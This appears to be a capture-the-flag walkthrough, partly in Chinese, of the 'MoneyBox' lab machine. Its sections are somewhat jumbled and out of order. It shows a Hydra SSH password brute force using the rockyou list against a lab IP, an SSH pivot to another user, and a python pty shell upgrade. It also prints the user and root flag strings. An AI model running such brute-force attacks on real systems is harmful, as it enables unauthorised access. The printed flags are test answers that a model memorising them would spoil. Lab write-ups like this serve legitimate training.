┌──(root㉿kill3r)-[/home/kill3r] └─# hydra -l renu -P /opt/pwcrack/PasswordDic/用户名和密码/密码/rockyou.txt 192.168.56.103 ssh Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-08 10:33:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task [DATA] attacking ssh://192.168.56.103:22/ [22][ssh] host: 192.168.56.103 login: renu password: 987654321 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-08 10:34:20
renu@MoneyBox:/home/lily/.ssh$ ssh lily@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80 lily@MoneyBox:~$
lily@MoneyBox:~$ id # 已经获取到了root权限 # 查看是否存在python,换到全交互式Shell # which python # which python3 /usr/bin/python3 #存在python3 # python3 -c 'import pty;pty.spawn("/bin/bash")'; root@MoneyBox:/home/lily# ls ls user2.txt root@MoneyBox:/home/lily# cd /root cd /root root@MoneyBox:~# ls -a . .. .bash_history .bashrc .local .profile .root.txt root@MoneyBox:~# cat .root.txt cat .root.txt Congratulations.......! You Successfully completed MoneyBox Finally The Root Flag ==> r00t{H4ckth3p14n3t} I'm Kirthik-KarvendhanT It's My First CTF Box instagram : ____kirthik____ See You Back.... root@MoneyBox:~# history
Web#### 访问靶场,寻找功能点
源代码没有什么的信息,只是提示这是一个非常简单靶场,进行目录扫描一波吧 发现了blogs目录,访问一下,看一下源代码并且继续扫一下目录 目录扫描没有任何结果,查看源代码发现了一句注释:!--the hint is the another secret directory is S3cr3t-T3xt--> 提示了一个目录叫S3cr3t-T3xt,访问一下看一看 发现一个Key,这个Key可能是刚刚图片隐写提取数据的密码
Shell as user1```bash
renu@MoneyBox:~$ cat user1.txt Yes…! You Got it User1 Flag ==> us3r1{F14g:0ku74tbd3777y4}
1 2 3 4 5
## Shell as user2```bash lily@MoneyBox:~$ cat user2.txt Yeah..... You Got a User2 Flag ==> us3r{F14g:tr5827r5wu6nklao}
以root身份进入Shell> 保存屏幕截图作为Flag或Proof
1 2 3 4 5 6 7 8 9 10
root@MoneyBox:~# cat .root.txt cat .root.txt Congratulations.......! You Successfully completed MoneyBox Finally The Root Flag ==> r00t{H4ckth3p14n3t} I'm Kirthik-KarvendhanT It's My First CTF Box instagram : ____kirthik____ See You Back....